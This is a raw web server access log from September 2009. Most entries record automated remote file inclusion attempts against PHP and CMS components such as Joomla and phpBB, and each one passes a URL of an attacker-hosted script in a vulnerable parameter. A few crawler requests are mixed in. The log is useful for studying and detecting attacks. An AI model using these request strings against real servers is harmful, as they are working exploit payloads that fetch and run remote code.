206.225.23.4 - - [06/Sep/2009:21:01:29 -0500] "GET //components/com_jce/jce.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:21:02:52 -0500] "GET //include/lib.inc.php?site_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:21:02:53 -0500] "GET /logs/access_log.1236211200//include/lib.inc.php?site_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:21:02:53 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
209.61.244.6 - - [06/Sep/2009:21:04:28 -0500] "GET /logs/access_log.1241654400/?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.61.244.6 - - [06/Sep/2009:21:04:28 -0500] "GET /?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.61.244.6 - - [06/Sep/2009:21:04:28 -0500] "GET /logs/?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 200 204070 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.61.244.6 - - [06/Sep/2009:21:06:19 -0500] "GET /logs/access_log.1239580800/?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
72.29.82.154 - - [06/Sep/2009:21:08:00 -0500] "GET /logs/access_log.1237420800//index.php?DOCUMENT_ROOT=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.29.82.154 - - [06/Sep/2009:21:08:00 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.29.82.154 - - [06/Sep/2009:21:08:00 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
65.55.106.110 - - [06/Sep/2009:21:08:02 -0500] "GET /logs/access_log.1225670400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.38.136.251 - - [06/Sep/2009:21:08:35 -0500] "GET //include/lib.inc.php?site_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:21:08:35 -0500] "GET /logs/access_log.1236211200//include/lib.inc.php?site_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:21:08:35 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:21:10:49 -0500] "GET /logs/access_log.1236038400//include/lib.inc.php?site_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
88.84.141.226 - - [06/Sep/2009:21:11:29 -0500] "GET /logs/errors.php?error=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
88.84.141.226 - - [06/Sep/2009:21:11:29 -0500] "GET /logs/access_log.1237420800/errors.php?error=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
88.84.141.226 - - [06/Sep/2009:21:11:29 -0500] "GET /errors.php?error=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
65.55.106.111 - - [06/Sep/2009:21:12:02 -0500] "GET /logs/access_log.1145404800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.182.186.172 - - [06/Sep/2009:21:13:38 -0500] "GET /logs/access_log.1236211200//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 342 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.182.186.172 - - [06/Sep/2009:21:13:38 -0500] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.182.186.172 - - [06/Sep/2009:21:13:38 -0500] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.182.186.172 - - [06/Sep/2009:21:14:59 -0500] "GET /logs/access_log.1237075200//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 342 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
211.234.100.46 - - [06/Sep/2009:21:19:06 -0500] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
211.234.100.46 - - [06/Sep/2009:21:19:06 -0500] "GET /logs/access_log.1236211200%22%20target=%22_blank//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 358 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
211.234.100.46 - - [06/Sep/2009:21:19:06 -0500] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.38.136.251 - - [06/Sep/2009:21:21:50 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:21:21:50 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:21:21:50 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.234.100.46 - - [06/Sep/2009:21:23:35 -0500] "GET /logs/access_log.1237075200%22%20target=%22_blank//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 358 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.38.136.251 - - [06/Sep/2009:21:28:19 -0500] "GET /logs/access_log.1239667200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.55.207.45 - - [06/Sep/2009:21:31:02 -0500] "GET /logs/access_log.1122508800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
219.85.63.226 - - [06/Sep/2009:21:38:52 -0500] "GET /logs/access_log.1247443200//include/print_category.php?setup[use_category]=1&dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
219.85.63.226 - - [06/Sep/2009:21:38:52 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
219.85.63.226 - - [06/Sep/2009:21:38:52 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
219.85.63.226 - - [06/Sep/2009:21:38:52 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
219.85.63.226 - - [06/Sep/2009:21:38:52 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
219.85.63.226 - - [06/Sep/2009:21:38:52 -0500] "GET /logs/access_log.1247443200//include/print_category.php?setup[use_category]=1&dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
209.61.244.6 - - [06/Sep/2009:21:38:55 -0500] "GET /logs/access_log.1236211200//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 342 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.61.244.6 - - [06/Sep/2009:21:38:55 -0500] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.61.244.6 - - [06/Sep/2009:21:38:55 -0500] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
72.29.82.154 - - [06/Sep/2009:21:39:08 -0500] "GET /?sourcedir=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
72.29.82.154 - - [06/Sep/2009:21:39:08 -0500] "GET /logs/access_log.1244678400/?sourcedir=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
72.29.82.154 - - [06/Sep/2009:21:39:09 -0500] "GET /logs/?sourcedir=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
219.85.63.226 - - [06/Sep/2009:21:39:13 -0500] "GET /logs/access_log.1239062400//include/print_category.php?setup[use_category]=1&dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
219.85.63.226 - - [06/Sep/2009:21:39:14 -0500] "GET /logs/access_log.1239062400//include/print_category.php?setup[use_category]=1&dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
72.29.82.154 - - [06/Sep/2009:21:39:23 -0500] "GET /logs/access_log.1247184000/?sourcedir=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
209.61.244.6 - - [06/Sep/2009:21:39:39 -0500] "GET /logs/access_log.1237075200//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 342 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
218.38.136.251 - - [06/Sep/2009:21:43:01 -0500] "GET /logs//includes/class_item.php?fileExtension=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:21:43:01 -0500] "GET //includes/class_item.php?fileExtension=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:21:43:01 -0500] "GET /logs/access_log.1237075200//includes/class_item.php?fileExtension=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:21:43:08 -0500] "GET /logs/access_log.1236038400//includes/class_item.php?fileExtension=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:21:45:55 -0500] "GET /logs/access_log.1232755200//includes/class_item.php?fileExtension=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:21:59:31 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:21:59:33 -0500] "GET /logs/access_log.1236038400//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:21:59:33 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
91.194.10.126 - - [06/Sep/2009:22:01:09 -0500] "GET //include.php?language=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
91.194.10.126 - - [06/Sep/2009:22:01:11 -0500] "GET /logs//include.php?language=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
91.194.10.126 - - [06/Sep/2009:22:01:11 -0500] "GET /logs/access_log.1237075200//include.php?language=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
91.194.10.126 - - [06/Sep/2009:22:01:24 -0500] "GET /logs/access_log.1234915200//include.php?language=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
91.194.10.126 - - [06/Sep/2009:22:01:24 -0500] "GET /logs/access_log.1236384000//include.php?language=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
63.249.95.132 - - [06/Sep/2009:22:08:37 -0500] "GET /logs/includes/search.php?GlobalSettings[templatesDirectory]=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.1" 404 307 "-""-"
63.249.95.132 - - [06/Sep/2009:22:08:37 -0500] "GET /includes/search.php?GlobalSettings[templatesDirectory]=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.1" 404 302 "-""-"
74.50.85.104 - - [06/Sep/2009:22:09:36 -0500] "GET //includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
74.50.85.104 - - [06/Sep/2009:22:09:40 -0500] "GET /logs//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.50.85.104 - - [06/Sep/2009:22:09:40 -0500] "GET /logs/access_log.1236211200//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
74.50.85.104 - - [06/Sep/2009:22:09:43 -0500] "GET /logs/access_log.1237075200//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
74.50.85.104 - - [06/Sep/2009:22:09:43 -0500] "GET //includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
74.50.85.104 - - [06/Sep/2009:22:09:43 -0500] "GET /logs//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.50.85.104 - - [06/Sep/2009:22:09:44 -0500] "GET /logs/access_log.1237075200//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
65.55.106.137 - - [06/Sep/2009:22:11:33 -0500] "GET /logs/access_log.1200787200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.109 - - [06/Sep/2009:22:13:32 -0500] "GET /logs/access_log.1235260800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
110.45.144.100 - - [06/Sep/2009:22:21:58 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 364 "-""libwww-perl/5.65"
110.45.144.100 - - [06/Sep/2009:22:21:59 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 359 "-""libwww-perl/5.65"
123.242.165.138 - - [06/Sep/2009:22:26:45 -0500] "GET /admin.php?_zb_path=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
123.242.165.138 - - [06/Sep/2009:22:26:45 -0500] "GET /logs/admin.php?_zb_path=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
67.218.116.131 - - [06/Sep/2009:22:28:54 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
206.225.23.4 - - [06/Sep/2009:22:32:24 -0500] "GET //?sourcedir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:32:24 -0500] "GET /logs/access_log.1247184000//?sourcedir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:32:24 -0500] "GET /logs/access_log.1244678400//?sourcedir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:32:25 -0500] "GET /logs//?sourcedir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 200 204075 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:32:35 -0500] "GET //?sourcedir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:32:35 -0500] "GET /logs/access_log.1244678400//?sourcedir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:32:35 -0500] "GET /logs/access_log.1247184000//?sourcedir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:32:36 -0500] "GET /logs//?sourcedir=http://museum-mputantular.com/css/id1?? HTTP/1.1" 200 204075 "-""Mozilla/5.0"
87.118.116.55 - - [06/Sep/2009:22:34:53 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
87.118.116.55 - - [06/Sep/2009:22:34:53 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
87.118.116.55 - - [06/Sep/2009:22:34:53 -0500] "GET /logs/access_log.1244764800/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
123.242.165.138 - - [06/Sep/2009:22:35:07 -0500] "GET /logs/admin.php?_zb_path=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
123.242.165.138 - - [06/Sep/2009:22:35:07 -0500] "GET /admin.php?_zb_path=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
87.118.116.55 - - [06/Sep/2009:22:35:36 -0500] "GET /logs/access_log.1248048000/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:36:05 -0500] "GET //export.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:36:05 -0500] "GET /logs/access_log.1239408000//export.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:36:05 -0500] "GET /logs//export.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:37:44 -0500] "GET /logs//export.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:37:44 -0500] "GET //export.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:37:44 -0500] "GET /logs/access_log.1243814400//export.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:37:48 -0500] "GET /logs/access_log.1244505600//export.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.58.163.86 - - [06/Sep/2009:22:40:26 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
207.58.163.86 - - [06/Sep/2009:22:40:26 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
207.58.163.86 - - [06/Sep/2009:22:40:44 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
207.58.163.86 - - [06/Sep/2009:22:40:44 -0500] "GET /logs/access_log.1242086400/e404.php?DOCUMENT_ROOT=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:42:42 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:42:42 -0500] "GET /logs/access_log.1244764800//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:42:42 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:42:43 -0500] "GET /logs/access_log.1244764800//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:42:44 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:42:44 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:46:31 -0500] "GET /logs/access_log.1243641600//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:46:31 -0500] "GET /logs/access_log.1241740800//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:47:15 -0500] "GET /logs/access_log.1243641600//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:47:20 -0500] "GET /logs/access_log.1241740800//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.236.18.27 - - [06/Sep/2009:22:47:28 -0500] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
94.236.18.27 - - [06/Sep/2009:22:47:28 -0500] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
65.55.106.210 - - [06/Sep/2009:22:51:03 -0500] "GET /logs/access_log.1114473600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
206.225.23.4 - - [06/Sep/2009:22:51:33 -0500] "GET /logs/access_log.1246320000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:51:33 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:51:33 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:22:54:36 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
72.29.82.154 - - [06/Sep/2009:22:54:43 -0500] "GET /logs/access_log.1241222400//admin/include/lib.module.php?mod_root=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
72.29.82.154 - - [06/Sep/2009:22:54:43 -0500] "GET /logs//admin/include/lib.module.php?mod_root=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
72.29.82.154 - - [06/Sep/2009:22:54:43 -0500] "GET //admin/include/lib.module.php?mod_root=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
